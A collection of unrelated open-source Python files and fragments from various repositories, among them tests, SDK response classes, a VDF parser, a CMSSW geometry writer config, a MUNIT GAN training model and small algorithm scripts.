model object warc = Warc.objects.get(warc_id="test_collection-flickr-2015-07-28T11:17:36Z") self.assertEqual(self.consumer.message["warc"]["path"], warc.path) self.assertEqual(self.consumer.message["warc"]["sha1"], warc.sha1) self.assertEqual(self.consumer.message["warc"]["bytes"], warc.bytes) self.assertEqual(iso8601.parse_date("2015-07-28T11:17:36.640178"), warc.date_created) self.assertEqual(self.harvest, warc.harvest) def test_export_status_on_message(self): self.consumer.routing_key = "export.status.test" self.consumer.message = { "id": "test:2", "status": "running", "date_started": "2015-07-28T11:17:36.640044", "infos": [{"code": "test_code_1", "message": "congratulations"}], "warnings": [{"code": "test_code_2", "message": "be careful"}], "errors": [{"code": "test_code_3", "message": "oops"}], "service": "Twitter Exporter", "host": "f0c3c5ef7031", "instance": "39", } # Trigger on_message self.consumer.on_message() # Check updated harvest model object export = Export.objects.get(export_id="test:2") self.assertEqual("running", export.status) self.assertEqual(iso8601.parse_date("2015-07-28T11:17:36.640044"), export.date_started) self.assertIsNone(export.date_ended) self.assertListEqual([{"code": "test_code_1", "message": "congratulations"}], export.infos) self.assertListEqual([{"code": "test_code_2", "message": "be careful"}], export.warnings) self.assertListEqual([{"code": "test_code_3", "message": "oops"}], export.errors) self.assertEqual("Twitter Exporter", export.service) self.assertEqual("f0c3c5ef7031", export.host) self.assertEqual("39", export.instance) # Now update self.consumer.message = { "id": "test:2", "status": "completed success", "date_started": "2015-07-28T11:17:36.640044", "date_ended": "2015-07-28T11:17:42.539470", "infos": [{"code": "test_code_1", "message": "congratulations"}], "warnings": [{"code": "test_code_2", "message": "be careful"}], "errors": [{"code": "test_code_3", "message": "oops"}], "service": "Twitter Exporter", "host": "f0c3c5ef7031", "instance": "39", } # Trigger on_message self.consumer.on_message() # Check updated harvest model object export = Export.objects.get(export_id="test:2") self.assertEqual("completed success", export.status) self.assertEqual(iso8601.parse_date("2015-07-28T11:17:36.640044"), export.date_started) self.assertEqual(iso8601.parse_date("2015-07-28T11:17:42.539470"), export.date_ended) self.assertListEqual([{"code": "test_code_1", "message": "congratulations"}], export.infos) self.assertListEqual([{"code": "test_code_2", "message": "be careful"}], export.warnings) self.assertListEqual([{"code": "test_code_3", "message": "oops"}], export.errors) self.assertEqual("Twitter Exporter", export.service) self.assertEqual("f0c3c5ef7031", export.host) self.assertEqual("39", export.instance)
Tests/Frequently_used_code/Polygon_drill_test.py
ScriptBox99/dea-notebooks
282
12729567
<filename>Tests/Frequently_used_code/Polygon_drill_test.py import pytest from pathlib import Path from testbook import testbook TEST_DIR = Path(__file__).parent.parent.resolve() NB_DIR = TEST_DIR.parent NB_PATH = NB_DIR / "Frequently_used_code" / "Polygon_drill.ipynb" @pytest.fixture(scope="module") def tb(): with testbook(NB_PATH, execute=True) as tb: yield tb def test_ok(tb): assert True # ok def test_geometry(tb): gdf = tb.ref("polygon_to_drill") assert "geometry" in gdf.columns def test_vars(tb): ds = tb.ref("data") expected_vars = [ "time", "y", "x", "spatial_ref", "nbart_red", "nbart_green", "nbart_blue", ] for var in expected_vars: assert var in ds.variables def test_shape(tb): ds = tb.ref("mask") assert len(ds.x) == 97 assert len(ds.y) == 120 def test_masked(tb): ds = tb.ref("data_masked") assert ds.nbart_red.isnull().any().item()
slack_bolt/authorization/__init__.py
korymath/bolt-python
160
12729613
from .authorize_result import AuthorizeResult
B03898_10_codes/StockOption.py
prakharShuklaOfficial/Mastering-Python-for-Finance-source-codes
446
12729683
""" README ====== This file contains Python codes. ====== """ """ Store common attributes of a stock option """ import math class StockOption(object): def __init__(self, S0, K, r, T, N, params): self.S0 = S0 self.K = K self.r = r self.T = T self.N = max(1, N) # Ensure N have at least 1 time step self.STs = None # Declare the stock prices tree """ Optional parameterss used by derived classes """ self.pu = params.get("pu", 0) # Probability of up state self.pd = params.get("pd", 0) # Probability of down state self.div = params.get("div", 0) # Divident yield self.sigma = params.get("sigma", 0) # Volatility self.is_call = params.get("is_call", True) # Call or put self.is_european = params.get("is_eu", True) # Eu or Am """ Computed values """ self.dt = T/float(N) # Single time step, in years self.df = math.exp( -(r-self.div) * self.dt) # Discount factor
CondTools/Geometry/test/writehelpers/geometryExtended2021DD4hep_writer.py
Purva-Chaudhari/cmssw
852
12729691
<filename>CondTools/Geometry/test/writehelpers/geometryExtended2021DD4hep_writer.py import FWCore.ParameterSet.Config as cms from Configuration.Eras.Era_Run3_dd4hep_cff import Run3_dd4hep process = cms.Process("GeometryWriter", Run3_dd4hep) from Configuration.ProcessModifiers.dd4hep_cff import dd4hep process.load('CondCore.CondDB.CondDB_cfi') process.load('Configuration.Geometry.GeometryDD4hepExtended2021_cff') process.load('Geometry.CaloEventSetup.CaloGeometryDBWriter_cfi') process.load('CondTools.Geometry.HcalParametersWriter_cff') process.load("Geometry.MuonNumbering.muonGeometryConstants_cff") process.CaloGeometryBuilder = cms.ESProducer("CaloGeometryBuilder", SelectedCalos = cms.vstring( 'HCAL', 'ZDC', 'EcalBarrel', 'EcalEndcap', 'EcalPreshower', 'TOWER' ) ) process.source = cms.Source("EmptyIOVSource", lastValue = cms.uint64(1), timetype = cms.string('runnumber'), firstValue = cms.uint64(1), interval = cms.uint64(1) ) # This reads the big XML file and the only way to fill the # nonreco part of the database is to read this file. process.XMLGeometryWriter = cms.EDAnalyzer("XMLGeometryBuilder", XMLFileName = cms.untracked.string("./geSingleBigFile.xml"), ZIP = cms.untracked.bool(True) ) process.TrackerGeometryWriter = cms.EDAnalyzer("PGeometricDetBuilder",fromDD4hep=cms.bool(True)) process.TrackerParametersWriter = cms.EDAnalyzer("PTrackerParametersDBBuilder",fromDD4hep=cms.bool(True)) process.CaloGeometryWriter = cms.EDAnalyzer("PCaloGeometryBuilder",fromDD4Hep = cms.untracked.bool(True)) process.CSCGeometryWriter = cms.EDAnalyzer("CSCRecoIdealDBLoader",fromDD4Hep = cms.untracked.bool(True)) process.DTGeometryWriter = cms.EDAnalyzer("DTRecoIdealDBLoader",fromDD4Hep = cms.untracked.bool(True)) process.RPCGeometryWriter = cms.EDAnalyzer("RPCRecoIdealDBLoader",fromDD4Hep = cms.untracked.bool(True)) process.GEMGeometryWriter = cms.EDAnalyzer("GEMRecoIdealDBLoader",fromDD4Hep = cms.untracked.bool(True)) process.CondDB.timetype = cms.untracked.string('runnumber') process.CondDB.connect = cms.string('sqlite_file:myfile.db') process.PoolDBOutputService = cms.Service("PoolDBOutputService", process.CondDB, toPut = cms.VPSet(cms.PSet(record = cms.string('GeometryFileRcd'),tag = cms.string('XMLFILE_Geometry_TagXX_Extended2021_mc')), cms.PSet(record = cms.string('IdealGeometryRecord'),tag = cms.string('TKRECO_Geometry_TagXX')), cms.PSet(record = cms.string('PTrackerParametersRcd'),tag = cms.string('TKParameters_Geometry_TagXX')), cms.PSet(record = cms.string('PEcalBarrelRcd'), tag = cms.string('EBRECO_Geometry_TagXX')), cms.PSet(record = cms.string('PEcalEndcapRcd'), tag = cms.string('EERECO_Geometry_TagXX')), cms.PSet(record = cms.string('PEcalPreshowerRcd'),tag = cms.string('EPRECO_Geometry_TagXX')), cms.PSet(record = cms.string('PHcalRcd'), tag = cms.string('HCALRECO_Geometry_TagXX')), cms.PSet(record = cms.string('HcalParametersRcd'), tag = cms.string('HCALParameters_Geometry_TagXX')), cms.PSet(record = cms.string('PCaloTowerRcd'), tag = cms.string('CTRECO_Geometry_TagXX')), cms.PSet(record = cms.string('PZdcRcd'), tag = cms.string('ZDCRECO_Geometry_TagXX')), cms.PSet(record = cms.string('PCastorRcd'), tag = cms.string('CASTORRECO_Geometry_TagXX')), cms.PSet(record = cms.string('CSCRecoGeometryRcd'),tag = cms.string('CSCRECO_Geometry_TagXX')), cms.PSet(record = cms.string('CSCRecoDigiParametersRcd'),tag = cms.string('CSCRECODIGI_Geometry_TagXX')), cms.PSet(record = cms.string('DTRecoGeometryRcd'),tag = cms.string('DTRECO_Geometry_TagXX')), cms.PSet(record = cms.string('RPCRecoGeometryRcd'),tag = cms.string('RPCRECO_Geometry_TagXX')), cms.PSet(record = cms.string('GEMRecoGeometryRcd'),tag = cms.string('GEMRECO_Geometry_TagXX')) ) ) process.maxEvents = cms.untracked.PSet( input = cms.untracked.int32(1) ) process.p1 = cms.Path(process.XMLGeometryWriter+process.TrackerGeometryWriter+process.TrackerParametersWriter+process.CaloGeometryWriter+process.HcalParametersWriter+process.CSCGeometryWriter+process.DTGeometryWriter+process.RPCGeometryWriter+process.GEMGeometryWriter)
cellphonedb/tools/app.py
BioTuring-Notebooks/CellphoneDB
278
12729742
import os from flask import Flask this_file_dir = os.path.dirname(os.path.realpath(__file__)) data_dir = '{}/data'.format(this_file_dir) output_dir = '{}/out'.format(this_file_dir) downloads_dir = '{}/downloads'.format(data_dir) def create_app(): app = Flask(__name__) return app
valve/vdf.py
Crowbar-Sledgehammer/python-valve
136
12729743
<reponame>Crowbar-Sledgehammer/python-valve # -*- coding: utf-8 -*- # Copyright (C) 2013 <NAME> """ Implements a parser for the Valve Data Format (VDF,) or as often refered KeyValues. Currently only provides parsing functionality without the ability to serialise. API designed to mirror that of the built-in JSON module. https://developer.valvesoftware.com/wiki/KeyValues """ import string import re _KV_KEY = 0 _KV_BLOCK = 1 _KV_BLOCKEND = 2 _KV_PAIR = 3 ALWAYS = 0 UNQUOTED = 1 NEVER = 2 def coerce_type(token): """ Attempts to convert a token to a native Python object by matching it against various regexes. Will silently fall back to string if no conversion can be made. Currently only capable of converting integers and floating point numbers. """ regexes = [ # regex, converter (r"^-?[0-9]+$", int), (r"^[-+]?[0-9]*\.?[0-9]+$", float), # TODO: ("rgb", pass), # TODO: ("hex triplet", pass), ] for regex, converter in regexes: print(regex, converter, token, re.match(regex, token, re.UNICODE)) if re.match(regex, token, re.UNICODE): return converter(token) # Fallback to string return token # Largely based on necavi's https://github.com/necavi/py-keyvalues def loads(src, encoding=None, coerce_=UNQUOTED): """ Loades a VDF string into a series of nested dictionaries. encoding -- The encoding of the given source string if not Unicode. If this is not set and a bytestring is given, ASCII will be the assumed encoding. corece_ -- can be set to determine whether an attempt should be made to convert values to native Python type equivalents. If set to UNQUOTED (default,) only values that are not enclosed in double quotes will be converted. If set to ALWAYS, will attempt to convert regardless of whether the value is quoted or not. not recommended. If set to NEVER, no attempt will be made to convert. Should produce most reliable behaviour. """ if isinstance(src, str) and encoding is None: encoding = "ascii" if encoding is not None: src = src.decode(encoding) # else: # assume unicode # pair type, pair key, pair value, coerce pairs = [[_KV_BLOCK, "", None, False]] # _KV_KEY -- all tokens begin as this # _KV_BLOCK -- is for when a _KV_KEY is followed by a { # _KV_PAIR -- is for when a _KV_KEY is followed by another token extended_alphanumeric = set( string.ascii_letters.decode("ascii") + unicode(string.digits) + u".-_") i = 0 line = 1 col = 0 token = None try: while i < len(src): char = src[i] # Whitespace if char in {u" ", u"\t"}: pass # End-of-line elif char == u"\n": try: if src[i+1] == u"\r": # Will IndexError at EOF i += 1 col += 1 line += 1 col = 0 except IndexError: pass # End-of-line elif char == u"\r": try: if src[i+1] == u"\n": # Will IndexError at EOF i += 1 col += 1 line += 1 col = 0 except IndexError: pass # Double-quotes enclosed token elif char == u"\"": token = u"" while True: i += 1 col += 1 char = src[i] # I don't agree with the assertion in py-keyvalues # that \n or \r should also terminate a token if # its quoted. if char == u"\"": break elif char in {"\r", "\n"}: raise SyntaxError("End-of-line quoted token") elif char == u"\\": i += 1 try: escaped_char = src[i] except IndexError: raise SyntaxError("EOF in escaped character") try: char = { u"n": u"\n", u"r": u"\r", u"t": u"\t", u"\"": u"\"", u"\\": u"\\", }[escaped_char] except KeyError: raise SyntaxError("Invalid escape character") token += char if pairs[-1][0] == _KV_KEY: pairs[-1][0] = _KV_PAIR pairs[-1][2] = token pairs[-1][3] = coerce_ in [ALWAYS] else: pairs.append([_KV_KEY, token, None, False]) # Unquoted token elif char in extended_alphanumeric: token = u"" while True: token += char i += 1 col += 1 char = src[i] if char not in extended_alphanumeric: # Assume end of token; in most cases this will # white space or a new line # If newline, rewind 1 char so it can be # properly handled by the end-of-line processors if char in {u"\n", u"\r"}: i -= 1 col -= 1 char = src[i] break if pairs[-1][0] == _KV_KEY: pairs[-1][0] = _KV_PAIR pairs[-1][2] = token pairs[-1][3] = coerce_ in [ALWAYS, UNQUOTED] else: pairs.append([_KV_KEY, token, None, False]) # I don't know if there are any cases where an unquoted # key may be illegal, e.g. if it contains only digits. # I assume it is, but I won't handle it for now. # Block start elif char == u"{": if pairs[-1][0] != _KV_KEY: raise SyntaxError("Block doesn't follow block name") pairs[-1][0] = _KV_BLOCK elif char == u"}": pairs.append([_KV_BLOCKEND, None, None, False]) else: raise SyntaxError("Unexpected character") i += 1 col += 1 except SyntaxError as exc: raise ValueError("{} '{}'; line {} column {}".format( exc.message, src[i], line, col)) dict_ = {} dict_stack = [dict_] CURRENT = -1 PREVIOUS = -2 for type, key, value, should_coerce in pairs[1:]: if type == _KV_BLOCK: dict_stack.append({}) dict_stack[PREVIOUS][key] = dict_stack[CURRENT] elif type == _KV_BLOCKEND: dict_stack = dict_stack[:CURRENT] elif type == _KV_PAIR: dict_stack[CURRENT][key] = (coerce_type(value) if should_coerce else value) # else: # should never occur, but would be caused by a token not being # followed by a block or value return dict_ def load(fp, encoding=None, coerce_=UNQUOTED): """ Same as loads but takes a file-like object as the source. """ return loads(fp.read(), encoding, coerce_) def dumps(obj, encoding=None, indent=u" ", object_encoders={}): """ Serialises a series of nested dictionaries to the VDF/KeyValues format and returns it as a string. If 'encoding' isn't specified a Unicode string will be returned, else an ecoded bytestring will be. 'indent' is the string to be used to indent nested blocks. The string given should be Unicode and represent one level of indentation. Four spaces by default. 'object_encoders' maps a series of types onto serialisers, which convert objects to their VDF equivalent. If no encoder is specified for a type it'll fall back to using __unicode__. Note that currently this likely causes None to be encoded incorrectly. Also, floats which include the exponent in their textual representaiton may also be 'wrong.' """ object_codecs = { float: lambda v: unicode(repr(v / 1.0)), } object_codecs.update(object_encoders) # I don't know how TYPE_NONE (None) are meant to be encoded so we # just use unicode() until it's known. lines = [] def recurse_obj(obj, indent_level=0): ind = indent * indent_level for key, value in obj.iteritems(): if isinstance(value, dict): lines.append(u"{}\"{}\"".format(ind, key)) lines.append(u"{}{{".format(ind)) recurse_obj(value, indent_level + 1) lines.append(u"{}}}".format(ind)) else: lines.append(u"{}\"{}\"{}\"{}\"".format( ind, key, indent, object_codecs.get(type(value), unicode)(value), )) recurse_obj(obj) if encoding is not None: return u"\n".join(lines).encode(encoding) else: return u"\n".join(lines) def dump(obj, fp, encoding, indent=u" ", object_encoders={}): """ Same as dumps but takes a file-like object 'fp' which will be written to. """ return fp.write(dumps(obj, encoding, indent, object_encoders))
compiler_gym/envs/llvm/service/passes/common.py
mostafaelhoushi/CompilerGym
562
12729779
<filename>compiler_gym/envs/llvm/service/passes/common.py # Copyright (c) Facebook, Inc. and its affiliates. # # This source code is licensed under the MIT license found in the # LICENSE file in the root directory of this source tree. from typing import NamedTuple, Optional class Pass(NamedTuple): """The declaration of an LLVM pass.""" # The name of the pass, e.g. "AddDiscriminatorsPass". name: str # The opt commandline flag which turns this pass on, e.g. "-add-discriminators". flag: str # The docstring for this pass, as reported by `opt -help`. E.g. "Add DWARF path discriminators". description: str # The path of the C++ file which defines this pass, relative to the LLVM source tree root. source: str # The path of the C++ header which declares this pass, relative to the LLVM source tree root. # If the header path could not be inferred, this is None. header: Optional[str] # Boolean flags set in INITIALIZE_PASS(). cfg: bool is_analysis: bool
benchmark/tests/test_automatic_test.py
yuanliya/Adlik
548
12729784
# Copyright 2019 ZTE corporation. All Rights Reserved. # SPDX-License-Identifier: Apache-2.0 """ The test of automatic test. """ import unittest import subprocess import os class TestAutomaticTest(unittest.TestCase): """ The test of automatic test """ @staticmethod def test_automatic_test(): """ The test of automatic test. """ base_dir = os.path.dirname(os.path.dirname(os.path.dirname(os.path.abspath(__file__)))) model_command = ['python3', 'benchmark/tests/test_model/mnist_keras/mnist_keras.py'] subprocess.run(args=model_command, cwd=base_dir, check=True) command = ['python3', 'benchmark/src/automatic_test.py', '-d', 'benchmark/tests/docker_test/openvino.Dockerfile', '-s', 'openvino', '-b', '.', '-a', '.', '-m', 'mnist', '-c', 'benchmark/tests/client_script/client_script.sh', '-ss', 'benchmark/tests/serving_script/openvino_serving_script.sh', '-l', os.path.join(base_dir, 'benchmark/log'), '-tm', 'benchmark/tests/test_model/mnist_keras', '-cis', 'mnist_client.py', '-i', 'mnist.png', '-cs', 'benchmark/tests/compile_script/openvino_compile_script.sh'] with subprocess.Popen(args=command, cwd=base_dir) as process: print(process.stdout)
Search/hash_tables.py
anand722000/algo_ds_101
175
12729799
#!/bin/python3 import math import os import random import re import sys def flavors(m,a): prices = {} for idx, p in enumerate(a): if m-p in prices: return prices[m-p], idx prices[p] = idx return None t = int(input().strip()) for a0 in range(t): m = int(input().strip()) n = int(input().strip()) a = list(map(int, input().strip().split(' '))) f1, f2 = flavors(m,a) print(f1+1, f2+1)
test/integration/samples_in/simple_format.py
Inveracity/flynt
487
12729843
var = 5 a = "my string {:.2f}".format(var)
alipay/aop/api/response/AlipayOpenMiniAmpeMobileappBatchqueryResponse.py
antopen/alipay-sdk-python-all
213
12729845
#!/usr/bin/env python # -*- coding: utf-8 -*- import json from alipay.aop.api.response.AlipayResponse import AlipayResponse from alipay.aop.api.domain.MobileAppInfo import MobileAppInfo class AlipayOpenMiniAmpeMobileappBatchqueryResponse(AlipayResponse): def __init__(self): super(AlipayOpenMiniAmpeMobileappBatchqueryResponse, self).__init__() self._mobile_app_info_list = None @property def mobile_app_info_list(self): return self._mobile_app_info_list @mobile_app_info_list.setter def mobile_app_info_list(self, value): if isinstance(value, list): self._mobile_app_info_list = list() for i in value: if isinstance(i, MobileAppInfo): self._mobile_app_info_list.append(i) else: self._mobile_app_info_list.append(MobileAppInfo.from_alipay_dict(i)) def parse_response_content(self, response_content): response = super(AlipayOpenMiniAmpeMobileappBatchqueryResponse, self).parse_response_content(response_content) if 'mobile_app_info_list' in response: self.mobile_app_info_list = response['mobile_app_info_list']
problems/tests/test_two_sum_ii_input_array_is_sorted.py
vinta/fuck-coding-interviews
590
12729856
# coding: utf-8 import unittest from problems.two_sum_ii_input_array_is_sorted import Solution class TestCase(unittest.TestCase): def setUp(self): self.solution = Solution() def test(self): test_data = [ {'numbers': [2, 7, 11, 15], 'target': 9, 'expected': [1, 2]}, {'numbers': [2, 3, 4], 'target': 6, 'expected': [1, 3]}, {'numbers': [-1, 0], 'target': -1, 'expected': [1, 2]}, {'numbers': [1, 2, 3, 4, 5, 6, 7, 19, 100, 222, 412], 'target': 13, 'expected': [6, 7]}, ] for data in test_data: numbers = data['numbers'] target = data['target'] expected = data['expected'] with self.subTest(numbers=numbers, target=target): self.assertEqual(self.solution.twoSum(numbers, target), expected) if __name__ == '__main__': unittest.main()
models/munit_model.py
NguyenHoangAn0511/gan-compression
1,005
12729881
<reponame>NguyenHoangAn0511/gan-compression import argparse import itertools import ntpath import os import numpy as np import torch from torch import nn from tqdm import tqdm from data import create_eval_dataloader from metric import create_metric_models, get_fid from models import networks from models.base_model import BaseModel from models.modules.loss import GANLoss from utils import util class MunitModel(BaseModel): @staticmethod def modify_commandline_options(parser, is_train=False): assert is_train parser = super(MunitModel, MunitModel).modify_commandline_options(parser, is_train) assert isinstance(parser, argparse.ArgumentParser) parser.add_argument('--restore_G_A_path', type=str, default=None, help='the path to restore the generator A') parser.add_argument('--restore_G_B_path', type=str, default=None, help='the path to restore the generator B') parser.add_argument('--restore_D_A_path', type=str, default=None, help='the path to restore the discriminator A') parser.add_argument('--restore_D_B_path', type=str, default=None, help='the path to restore the discriminator B') parser.add_argument('--style_dim', type=int, default=8, help='the dimension of the style vector') parser.add_argument('--n_downsample', type=int, default=2, help='the number of downsample layer in the generator') parser.add_argument('--n_res', type=int, default=4, help='the number of the ResBlock in the generator') parser.add_argument('--activ', type=str, default='relu', help='the activation type of the generator') parser.add_argument('--pad_type', type=str, default='reflect', help='the padding type of the generator') parser.add_argument('--mlp_dim', type=int, default=256, help='the dimension of the mlp layer in the generator') parser.add_argument('--no_style_encoder', action='store_true', help='whether to have the style encoder in the generator') parser.add_argument('--lambda_rec_x', type=float, default=10, help='weight of image reconstruction loss') parser.add_argument('--lambda_rec_s', type=float, default=1, help='weight of style reconstruction loss') parser.add_argument('--lambda_rec_c', type=float, default=1, help='weight of content reconstruction loss') parser.add_argument('--lambda_gan', type=float, default=1, help='weight of gan loss') parser.add_argument('--weight_decay', type=float, default=1e-4, help='weight decay of the optimizer') parser.add_argument('--real_stat_A_path', type=str, required=True, help='the path to load the ground-truth A images information to compute FID.') parser.add_argument('--real_stat_B_path', type=str, required=True, help='the path to load the ground-truth B images information to compute FID.') parser.set_defaults(dataset_mode='unaligned', gan_mode='lsgan', load_size=256, netG='munit', netD='ms_image', ndf=64, n_layers_D=4, init_type='kaiming', lr_policy='step', lr=1e-4, scheduler_counter='iter', nepochs=21, nepochs_decay=0, niters=1000000, save_latest_freq=100000000, save_epoch_freq=1) return parser def __init__(self, opt): assert opt.isTrain assert opt.direction == 'AtoB' assert opt.dataset_mode == 'unaligned' valid_netGs = ['munit', 'mobile_munit'] assert opt.netG in valid_netGs super(MunitModel, self).__init__(opt) self.loss_names = ['D_A', 'G_rec_xA', 'G_rec_sA', 'G_rec_cA', 'G_gan_A', 'D_B', 'G_rec_xB', 'G_rec_sB', 'G_rec_cB', 'G_gan_B'] self.visual_names = ['real_A', 'fake_A', 'real_A', 'fake_B'] self.model_names = ['G_A', 'G_B', 'D_A', 'D_B'] self.netG_A = networks.define_G(opt.netG, init_type=opt.init_type, init_gain=opt.init_gain, gpu_ids=self.gpu_ids, opt=opt) self.netG_B = networks.define_G(opt.netG, init_type=opt.init_type, init_gain=opt.init_gain, gpu_ids=self.gpu_ids, opt=opt) self.netD_A = networks.define_D(opt.netD, input_nc=opt.input_nc, init_type='normal', init_gain=opt.init_gain, gpu_ids=self.gpu_ids, opt=opt) self.netD_B = networks.define_D(opt.netD, input_nc=opt.output_nc, init_type='normal', init_gain=opt.init_gain, gpu_ids=self.gpu_ids, opt=opt) self.criterionGAN = GANLoss(opt.gan_mode).to(self.device) self.criterionRec = nn.L1Loss() self.optimizer_G = torch.optim.Adam(itertools.chain(self.netG_A.parameters(), self.netG_B.parameters()), lr=opt.lr, betas=(opt.beta1, 0.999), weight_decay=opt.weight_decay) self.optimizer_D = torch.optim.Adam(itertools.chain(self.netD_A.parameters(), self.netD_B.parameters()), lr=opt.lr, betas=(opt.beta1, 0.999), weight_decay=opt.weight_decay) self.optimizers = [self.optimizer_G, self.optimizer_D] self.eval_dataloader_AtoB = create_eval_dataloader(self.opt, direction='AtoB') self.eval_dataloader_BtoA = create_eval_dataloader(self.opt, direction='BtoA') self.inception_model, _, _ = create_metric_models(opt, self.device) self.best_fid_A, self.best_fid_B = 1e9, 1e9 self.fids_A, self.fids_B = [], [] self.is_best = False self.npz_A = np.load(opt.real_stat_A_path) self.npz_B = np.load(opt.real_stat_B_path) def set_input(self, input): self.real_A = input['A'].to(self.device) self.real_B = input['B'].to(self.device) def set_single_input(self, input): self.real_A = input['A'].to(self.device) self.image_paths = input['A_paths'] def test_single_side(self, direction): G_A = getattr(self, 'netG_%s' % direction[0]) G_B = getattr(self, 'netG_%s' % direction[-1]) opt = self.opt batch_size = self.real_A.size(0) style_dim = opt.style_dim with torch.no_grad(): s = torch.randn(batch_size, style_dim, 1, 1, device=self.device) c, _ = G_A.encode(self.real_A, need_style=False) self.fake_B = G_B.decode(c, s) def forward(self, config=None): raise NotImplementedError def backward_G(self): opt = self.opt batch_size = self.real_A.size(0) style_dim = opt.style_dim s_a = torch.randn(batch_size, style_dim, 1, 1, device=self.device) s_b = torch.randn(batch_size, style_dim, 1, 1, device=self.device) # encode c_a, s_a_prime = self.netG_A.encode(self.real_A) c_b, s_b_prime = self.netG_B.encode(self.real_B) # decode (within domain) rec_A = self.netG_A.decode(c_a, s_a_prime) rec_B = self.netG_B.decode(c_b, s_b_prime) # decode (cross domain) fake_A = self.netG_A.decode(c_b, s_a) fake_B = self.netG_B.decode(c_a, s_b) # encode again c_b_recon, s_a_recon = self.netG_A.encode(fake_A) c_a_recon, s_b_recon = self.netG_B.encode(fake_B) # reconstruction loss self.loss_G_rec_xA = opt.lambda_rec_x * self.criterionRec(rec_A, self.real_A) self.loss_G_rec_xB = opt.lambda_rec_x * self.criterionRec(rec_B, self.real_B) self.loss_G_rec_sA = opt.lambda_rec_s * self.criterionRec(s_a_recon, s_a) self.loss_G_rec_sB = opt.lambda_rec_s * self.criterionRec(s_b_recon, s_b) self.loss_G_rec_cA = opt.lambda_rec_c * self.criterionRec(c_a_recon, c_a) self.loss_G_rec_cB = opt.lambda_rec_c * self.criterionRec(c_b_recon, c_b) # gan loss self.loss_G_gan_A = opt.lambda_gan * self.criterionGAN(self.netD_A(fake_A), True, for_discriminator=False) self.loss_G_gan_B = opt.lambda_gan * self.criterionGAN(self.netD_B(fake_B), True, for_discriminator=False) self.loss_G = self.loss_G_rec_xA + self.loss_G_rec_xB + \ self.loss_G_rec_sA + self.loss_G_rec_sB + \ self.loss_G_rec_cA + self.loss_G_rec_cB + \ self.loss_G_gan_A + self.loss_G_gan_B self.loss_G.backward() def backward_D(self): opt = self.opt batch_size = self.real_A.size(0) style_dim = opt.style_dim s_a = torch.randn(batch_size, style_dim, 1, 1, device=self.device) s_b = torch.randn(batch_size, style_dim, 1, 1, device=self.device) # encode c_a, _ = self.netG_A.encode(self.real_A, need_style=False) c_b, _ = self.netG_B.encode(self.real_B, need_style=False) # decode (cross domain) fake_A = self.netG_A.decode(c_b, s_a) fake_B = self.netG_B.decode(c_a, s_b) # gan loss self.loss_D_A = opt.lambda_gan * (self.criterionGAN(self.netD_A(fake_A.detach()), False) + self.criterionGAN(self.netD_A(self.real_A), True)) self.loss_D_B = opt.lambda_gan * (self.criterionGAN(self.netD_B(fake_B.detach()), False) + self.criterionGAN(self.netD_B(self.real_B), True)) self.loss_D = self.loss_D_A + self.loss_D_B self.loss_D.backward() def optimize_parameters(self, steps): self.set_requires_grad([self.netD_A, self.netD_B], False) # Ds require no gradients when optimizing Gs self.optimizer_G.zero_grad() self.backward_G() self.optimizer_G.step() self.set_requires_grad([self.netD_A, self.netD_B], True) # Ds require no gradients when optimizing Gs self.optimizer_D.zero_grad() # set D_A and D_B's gradients to zero self.backward_D() # calculate gradients for D_A and D_B self.optimizer_D.step() # update D_A and D_B's weights def profile(self, config=None, verbose=True): raise NotImplementedError def test(self, config=None): with torch.no_grad(): self.forward(config) def evaluate_model(self, step): ret = {} self.is_best = False save_dir = os.path.join(self.opt.log_dir, 'eval', str(step)) os.makedirs(save_dir, exist_ok=True) self.netG_A.eval() self.netG_B.eval() for direction in ['AtoB', 'BtoA']: eval_dataloader = getattr(self, 'eval_dataloader_' + direction) fakes, names = [], [] cnt = 0 for i, data_i in enumerate(tqdm(eval_dataloader, desc='Eval %s ' % direction, position=2, leave=False)): self.set_single_input(data_i) self.test_single_side(direction) fakes.append(self.fake_B.cpu()) for j in range(len(self.image_paths)): short_path = ntpath.basename(self.image_paths[j]) name = os.path.splitext(short_path)[0] names.append(name) if cnt < 10: input_im = util.tensor2im(self.real_A[j]) fake_im = util.tensor2im(self.fake_B[j]) util.save_image(input_im, os.path.join(save_dir, direction, 'input', '%s.png' % name), create_dir=True) util.save_image(fake_im, os.path.join(save_dir, direction, 'fake', '%s.png' % name), create_dir=True) cnt += 1 suffix = direction[-1] fid = get_fid(fakes, self.inception_model, getattr(self, 'npz_%s' % direction[-1]), device=self.device, batch_size=self.opt.eval_batch_size, tqdm_position=2) if fid < getattr(self, 'best_fid_%s' % suffix): self.is_best = True setattr(self, 'best_fid_%s' % suffix, fid) fids = getattr(self, 'fids_%s' % suffix) fids.append(fid) if len(fids) > 3: fids.pop(0) ret['metric/fid_%s' % suffix] = fid ret['metric/fid_%s-mean' % suffix] = sum(getattr(self, 'fids_%s' % suffix)) / len( getattr(self, 'fids_%s' % suffix)) ret['metric/fid_%s-best' % suffix] = getattr(self, 'best_fid_%s' % suffix) self.netG_A.train() self.netG_B.train() return ret
scripts/remove-multilabel-pairs.py
brmson/dataset-factoid-webquestions
161
12729883
<gh_stars>100-1000 #!/usr/bin/env python3 import csv, sys file_name = sys.argv[1] pos = {} with open(file_name) as f: r = csv.reader(f, delimiter=',') for s in r: if (s[0] == 'qtext'): continue key = s[0] + ',' + s[2] if (s[1] == '1'): if (key in pos): pos[key] += 1 else: pos[key] = 1 outcsv = csv.DictWriter(sys.stdout, fieldnames=['qtext', 'label', 'atext']) outcsv.writeheader() with open(file_name) as f: r = csv.reader(f, delimiter=',') for s in r: if (s[0] == 'qtext'): continue key = s[0] + ',' + s[2] if (key not in pos or s[1] == '1'): outcsv.writerow({'qtext':s[0], 'label':s[1], 'atext':s[2]})
alipay/aop/api/response/ZhimaCreditContractBorrowQueryResponse.py
antopen/alipay-sdk-python-all
213
12729904
#!/usr/bin/env python # -*- coding: utf-8 -*- import json from alipay.aop.api.response.AlipayResponse import AlipayResponse class ZhimaCreditContractBorrowQueryResponse(AlipayResponse): def __init__(self): super(ZhimaCreditContractBorrowQueryResponse, self).__init__() self._status = None self._subjects_borrowed = None self._subjects_returned = None @property def status(self): return self._status @status.setter def status(self, value): self._status = value @property def subjects_borrowed(self): return self._subjects_borrowed @subjects_borrowed.setter def subjects_borrowed(self, value): self._subjects_borrowed = value @property def subjects_returned(self): return self._subjects_returned @subjects_returned.setter def subjects_returned(self, value): self._subjects_returned = value def parse_response_content(self, response_content): response = super(ZhimaCreditContractBorrowQueryResponse, self).parse_response_content(response_content) if 'status' in response: self.status = response['status'] if 'subjects_borrowed' in response: 